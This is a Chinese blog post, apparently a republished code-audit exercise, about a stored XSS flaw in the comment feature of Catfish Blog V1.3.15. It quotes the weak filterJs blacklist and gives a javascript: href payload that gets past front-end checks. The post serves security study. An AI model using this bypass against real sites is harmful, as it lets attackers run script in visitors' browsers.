码迷,mamicode.com
首页 > 其他好文 > 详细

Catfish(鲶鱼) Blog V1.3.15存储型 xss

时间:2020-03-05 13:11:29      阅读:71      评论:0      收藏:0      [点我收藏+]

标签:upd   不能   src   ==   mamicode   field   练习   lse   filter   

0x00前言

开始从小的漏洞开始练习,搬运项目地址:

https://github.com/imsebao/Code-Audit

0x01

Catfish(鲶鱼) Blog前台文章评论处存在 存储型xss漏洞。 在 application\index\controller\index.php 文件第 692行

public function pinglun()
{
$beipinglunren = Db::name('posts')->where('id',Request::instance()-
>post('id'))->field('post_author')->find();
$comment = Db::name('options')->where('option_name','comment')-
>field('option_value')->find();
$plzt = 1;
if($comment['option_value'] == 1)
{
$plzt = 0;
}
$uid = 0;
if(Session::has($this->session_prefix.'user_id'))
{
$uid = Session::get($this->session_prefix.'user_id');
}
$data = [
'post_id' => Request::instance()->post('id'),
'url' => 'index/Index/article/id/'.Request::instance()->post('id'),
'uid' => $uid,
'to_uid' => $beipinglunren['post_author'],
'createtime' => date("Y-m-d H:i:s"),
'content' => $this->filterJs(Request::instance()->post('pinglun')),
'status' => $plzt
];
Db::name('comments')->insert($data);
Db::name('posts')
->where('id', Request::instance()->post('id'))
->update([
'post_comment' => date("Y-m-d H:i:s"),
'comment_count' => ['exp','comment_count+1']
]);
$param = '';
Hook::add('comment_post',$this->plugins);
Hook::listen('comment_post',$param,$this->ccc);
}

参数 content 经过了 filterJs 过滤,继续跟进 filterJs
在文件 application\index\controller\Common.php 第831行

protected function filterJs($str)
{
while(stripos($str,'<script') !== false || stripos($str,'<style') !==
false || stripos($str,'<iframe') !== false || stripos($str,'<frame') !== false
|| stripos($str,'onclick') !== false)
{
$str = preg_replace(['/<script[\s\S]*?
<\/script[\s]*>/i','/<style[\s\S]*?<\/style[\s]*>/i','/<iframe[\s\S]*?
[<\/iframe|\/][\s]*>/i','/<frame[\s\S]*?[<\/frame|\/][\s]*>/i','/on[A-Za-z]+
[\s]*=[\s]*[\'|"][\s\S]*?[\'|"]/i'],'',$str);
}
return $str;
}

看一下这里的逻辑,判断字符串是否存在

漏洞复现: 前台页面找一篇文章,进行评论。评论加入超链接,这里因为有前端过滤所以不能直接输入 payload,随便填写,然后F12修改超链接地址为 xsspayload

<a target="_self"
href="javascript:onmouseover=alert(123)">http://javascript:onmouseover=alert(123).c</a>

这样就绕过了前端认证,提交评论。
技术图片

然后访问文章,点击评论触发xss漏洞。

emmm一个挺简单的XSS,这里的话仅仅是因为前端过滤,导致我们可以绕过。前端验证的话bp抓包应该也可以。这里简单记录一下,后面如果出现类似的漏洞成因就不再记录了。只写一些有趣的XSS了。

Catfish(鲶鱼) Blog V1.3.15存储型 xss

标签:upd   不能   src   ==   mamicode   field   练习   lse   filter   

原文地址:https://www.cnblogs.com/wangtanzhi/p/12419477.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!